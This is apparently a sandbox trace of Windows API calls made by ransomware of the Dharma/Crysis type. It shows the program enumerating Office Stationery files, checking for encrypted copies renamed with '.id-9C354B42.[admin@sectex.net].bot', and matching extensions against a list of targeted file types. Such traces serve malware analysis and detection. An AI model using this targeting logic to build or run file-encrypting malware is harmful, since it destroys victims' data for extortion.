	[0041.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.312] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2920) returned 1
	[0041.312] CloseHandle (hObject=0x1d0) returned 1
	[0041.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20
	[0041.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.313] lstrlenW (lpString=".doc") returned 4
	[0041.313] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1
	[0041.313] lstrlenW (lpString=".docx") returned 5
	[0041.313] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1
	[0041.313] lstrlenW (lpString=".pdf") returned 4
	[0041.313] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1
	[0041.313] lstrlenW (lpString=".xls") returned 4
	[0041.313] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1
	[0041.313] lstrlenW (lpString=".xlsx") returned 5
	[0041.313] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1
	[0041.313] lstrlenW (lpString=".ppt") returned 4
	[0041.313] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1
	[0041.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.313] lstrlenW (lpString=".zip") returned 4
	[0041.313] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1
	[0041.313] lstrlenW (lpString=".rar") returned 4
	[0041.313] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1
	[0041.313] lstrlenW (lpString=".bz2") returned 4
	[0041.313] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1
	[0041.313] lstrlenW (lpString=".7z") returned 3
	[0041.313] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1
	[0041.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.313] lstrlenW (lpString=".dbf") returned 4
	[0041.313] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1
	[0041.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.313] lstrlenW (lpString=".1cd") returned 4
	[0041.313] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString=".jpg") returned 4
	[0041.314] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString=".doc") returned 4
	[0041.314] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString=".docx") returned 5
	[0041.314] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1
	[0041.314] lstrlenW (lpString=".pdf") returned 4
	[0041.314] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString=".xls") returned 4
	[0041.314] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1
	[0041.314] lstrlenW (lpString=".xlsx") returned 5
	[0041.314] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1
	[0041.314] lstrlenW (lpString=".ppt") returned 4
	[0041.314] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString=".zip") returned 4
	[0041.314] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1
	[0041.314] lstrlenW (lpString=".rar") returned 4
	[0041.314] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString=".bz2") returned 4
	[0041.314] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString=".7z") returned 3
	[0041.314] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString=".dbf") returned 4
	[0041.314] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString=".1cd") returned 4
	[0041.314] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1
	[0041.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71
	[0041.314] lstrlenW (lpString=".jpg") returned 4
	[0041.314] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1
	[0041.315] lstrcmpiW (lpString1=".wmf", lpString2=".bot") returned 1
	[0041.315] lstrlenW (lpString="grid_(inch).wmf") returned 15
	[0041.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.315] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=7498) returned 1
	[0041.315] CloseHandle (hObject=0x1d0) returned 1
	[0041.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20
	[0041.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.315] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.315] lstrlenW (lpString=".doc") returned 4
	[0041.315] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1
	[0041.315] lstrlenW (lpString=".docx") returned 5
	[0041.315] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1
	[0041.315] lstrlenW (lpString=".pdf") returned 4
	[0041.316] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString=".xls") returned 4
	[0041.316] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1
	[0041.316] lstrlenW (lpString=".xlsx") returned 5
	[0041.316] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1
	[0041.316] lstrlenW (lpString=".ppt") returned 4
	[0041.316] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.316] lstrlenW (lpString=".zip") returned 4
	[0041.316] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1
	[0041.316] lstrlenW (lpString=".rar") returned 4
	[0041.316] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString=".bz2") returned 4
	[0041.316] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString=".7z") returned 3
	[0041.316] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1
	[0041.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.316] lstrlenW (lpString=".dbf") returned 4
	[0041.316] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.316] lstrlenW (lpString=".1cd") returned 4
	[0041.316] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.316] lstrlenW (lpString=".jpg") returned 4
	[0041.316] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.316] lstrlenW (lpString=".doc") returned 4
	[0041.316] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString=".docx") returned 5
	[0041.316] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1
	[0041.316] lstrlenW (lpString=".pdf") returned 4
	[0041.316] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1
	[0041.316] lstrlenW (lpString=".xls") returned 4
	[0041.317] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1
	[0041.317] lstrlenW (lpString=".xlsx") returned 5
	[0041.317] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1
	[0041.317] lstrlenW (lpString=".ppt") returned 4
	[0041.317] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1
	[0041.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.317] lstrlenW (lpString=".zip") returned 4
	[0041.317] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1
	[0041.317] lstrlenW (lpString=".rar") returned 4
	[0041.317] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1
	[0041.317] lstrlenW (lpString=".bz2") returned 4
	[0041.317] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1
	[0041.317] lstrlenW (lpString=".7z") returned 3
	[0041.317] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1
	[0041.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.317] lstrlenW (lpString=".dbf") returned 4
	[0041.317] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1
	[0041.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.317] lstrlenW (lpString=".1cd") returned 4
	[0041.317] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1
	[0041.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73
	[0041.317] lstrlenW (lpString=".jpg") returned 4
	[0041.317] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1
	[0041.317] lstrcmpiW (lpString1=".htm", lpString2=".bot") returned 1
	[0041.317] lstrlenW (lpString="Hand Prints.htm") returned 15
	[0041.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.659] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=235) returned 1
	[0041.659] CloseHandle (hObject=0x1f8) returned 1
	[0041.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20
	[0041.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.659] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString=".doc") returned 4
	[0041.660] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0041.660] lstrlenW (lpString=".docx") returned 5
	[0041.660] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1
	[0041.660] lstrlenW (lpString=".pdf") returned 4
	[0041.660] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0041.660] lstrlenW (lpString=".xls") returned 4
	[0041.660] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0041.660] lstrlenW (lpString=".xlsx") returned 5
	[0041.660] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1
	[0041.660] lstrlenW (lpString=".ppt") returned 4
	[0041.660] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0041.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString=".zip") returned 4
	[0041.660] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0041.660] lstrlenW (lpString=".rar") returned 4
	[0041.660] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0041.660] lstrlenW (lpString=".bz2") returned 4
	[0041.660] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0041.660] lstrlenW (lpString=".7z") returned 3
	[0041.660] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0041.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString=".dbf") returned 4
	[0041.660] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0041.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString=".1cd") returned 4
	[0041.660] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0041.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString=".jpg") returned 4
	[0041.660] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0041.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.660] lstrlenW (lpString=".doc") returned 4
	[0041.661] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0041.661] lstrlenW (lpString=".docx") returned 5
	[0041.661] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1
	[0041.661] lstrlenW (lpString=".pdf") returned 4
	[0041.661] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0041.661] lstrlenW (lpString=".xls") returned 4
	[0041.661] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0041.661] lstrlenW (lpString=".xlsx") returned 5
	[0041.661] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1
	[0041.661] lstrlenW (lpString=".ppt") returned 4
	[0041.661] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0041.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.661] lstrlenW (lpString=".zip") returned 4
	[0041.661] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0041.661] lstrlenW (lpString=".rar") returned 4
	[0041.661] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0041.661] lstrlenW (lpString=".bz2") returned 4
	[0041.661] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0041.661] lstrlenW (lpString=".7z") returned 3
	[0041.661] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0041.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.661] lstrlenW (lpString=".dbf") returned 4
	[0041.661] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0041.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.661] lstrlenW (lpString=".1cd") returned 4
	[0041.661] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0041.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73
	[0041.661] lstrlenW (lpString=".jpg") returned 4
	[0041.661] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0041.661] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0041.662] lstrlenW (lpString="HandPrints.jpg") returned 14
	[0041.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.662] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=4222) returned 1
	[0041.662] CloseHandle (hObject=0x1f8) returned 1
	[0041.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20
	[0041.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.662] lstrlenW (lpString=".doc") returned 4
	[0041.662] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.662] lstrlenW (lpString=".docx") returned 5
	[0041.662] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1
	[0041.662] lstrlenW (lpString=".pdf") returned 4
	[0041.663] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.663] lstrlenW (lpString=".xls") returned 4
	[0041.663] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.663] lstrlenW (lpString=".xlsx") returned 5
	[0041.663] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1
	[0041.663] lstrlenW (lpString=".ppt") returned 4
	[0041.663] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.663] lstrlenW (lpString=".zip") returned 4
	[0041.663] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.663] lstrlenW (lpString=".rar") returned 4
	[0041.663] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.663] lstrlenW (lpString=".bz2") returned 4
	[0041.663] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.663] lstrlenW (lpString=".7z") returned 3
	[0041.663] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.663] lstrlenW (lpString=".dbf") returned 4
	[0041.663] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0041.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.663] lstrlenW (lpString=".1cd") returned 4
	[0041.663] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0041.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.663] lstrlenW (lpString=".jpg") returned 4
	[0041.663] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0041.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.663] lstrlenW (lpString=".doc") returned 4
	[0041.663] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0041.663] lstrlenW (lpString=".docx") returned 5
	[0041.663] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1
	[0041.663] lstrlenW (lpString=".pdf") returned 4
	[0041.663] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0041.663] lstrlenW (lpString=".xls") returned 4
	[0041.663] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0041.664] lstrlenW (lpString=".xlsx") returned 5
	[0041.664] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1
	[0041.664] lstrlenW (lpString=".ppt") returned 4
	[0041.664] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0041.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.664] lstrlenW (lpString=".zip") returned 4
	[0041.664] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0041.664] lstrlenW (lpString=".rar") returned 4
	[0041.664] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0041.664] lstrlenW (lpString=".bz2") returned 4
	[0041.664] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0041.664] lstrlenW (lpString=".7z") returned 3
	[0041.664] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0041.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.664] lstrlenW (lpString=".dbf") returned 4
	[0041.664] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0041.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.664] lstrlenW (lpString=".1cd") returned 4
	[0041.664] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0041.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72
	[0041.664] lstrlenW (lpString=".jpg") returned 4
	[0041.664] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0041.664] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0041.664] lstrlenW (lpString="Memo.emf") returned 8
	[0041.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0041.665] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=152300) returned 1
	[0041.665] CloseHandle (hObject=0x1f8) returned 1
	[0041.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf")) returned 0x20
	[0041.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0041.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString=".doc") returned 4
	[0041.666] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0041.666] lstrlenW (lpString=".docx") returned 5
	[0041.666] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1
	[0041.666] lstrlenW (lpString=".pdf") returned 4
	[0041.666] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0041.666] lstrlenW (lpString=".xls") returned 4
	[0041.666] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0041.666] lstrlenW (lpString=".xlsx") returned 5
	[0041.666] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1
	[0041.666] lstrlenW (lpString=".ppt") returned 4
	[0041.666] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0041.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66
	[0041.666] lstrlenW (lpString=".zip") returned 4
	[0041.666] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
